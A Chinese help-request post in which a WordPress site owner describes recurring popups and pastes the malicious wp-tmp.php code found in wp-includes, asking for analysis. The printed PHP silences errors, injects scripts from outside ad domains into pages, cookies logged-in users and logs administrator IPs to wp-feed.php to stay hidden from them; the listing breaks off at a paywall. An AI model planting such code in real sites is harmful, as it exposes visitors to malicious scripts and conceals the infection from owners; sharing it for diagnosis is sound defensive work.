博主发现网站频繁弹窗,经检查在wp-includes目录下存在wp-tmp.php和wp-feed.php两个可疑文件,其中wp-tmp.php包含不明代码,wp-feed.php记录大量控制IP。主题functions.php也发现异常代码。疑似WordPress被木马感染,请求社区大神帮助分析和提供解决方案。
我们知道wordpress由于开源的原因,插件很多,破解很多,一不小心就会中招,我就是这样的小白吧,希望有大神能指点下,或者拔一下这个毒瘤信息,谢谢!
网站用了很多插件,之后就经常弹窗,后来查找到在wp-include下自动生成了 wp-tmp.php 以及 wp-feed.php文件,这里挂出来这个代码。
wp-tmp.php 代码如下:
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='12335f8c45ff73be536601a7562a3220';
if ( ! function_exists( 'slider_option' ) ) {
function slider_option($content){
if(is_single())
{
$con = '
';
$con2 = '
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2406632"></script>
<script src="//thoorest.com/ntfc.php?p=2406635&tco=1" data-cfasync="false" async></script>
';
$content=$content.$con2;
}
return $content;
}
function slider_option_footer(){
if(!is_single())
{
$con2 = '
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2406632"></script>
<script src="//thoorest.com/ntfc.php?p=2406635&tco=1" data-cfasync="false" async></script>
';
echo $con2;
}
}
function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','ba
最低0.47元/天 解锁文章
扫一扫
246
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
